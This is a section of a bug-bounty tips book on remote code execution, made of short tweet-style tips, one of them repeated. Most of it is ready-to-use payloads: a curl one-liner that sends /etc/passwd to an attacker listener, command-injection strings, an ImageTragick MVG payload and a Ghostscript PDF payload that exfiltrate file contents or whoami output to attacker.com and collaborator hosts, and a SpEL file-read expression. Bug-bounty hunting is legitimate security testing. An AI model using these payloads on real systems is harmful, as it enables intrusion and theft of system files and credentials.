Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

Remote Code Execution (RCE)

PreviousCRLFNextEmail Bypass

Last updated 1 month ago

If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=inputid or you can even setup a NC & try request=input&&http://wgetyourserver.com :port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.
Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
#bugbountytip Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=input`id` or you can even setup a NC & try request=input&&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
Does the target use AEM? try this path target[.]com/etc/groovyconsole.html and use the payload in the pic If you lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(http://org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())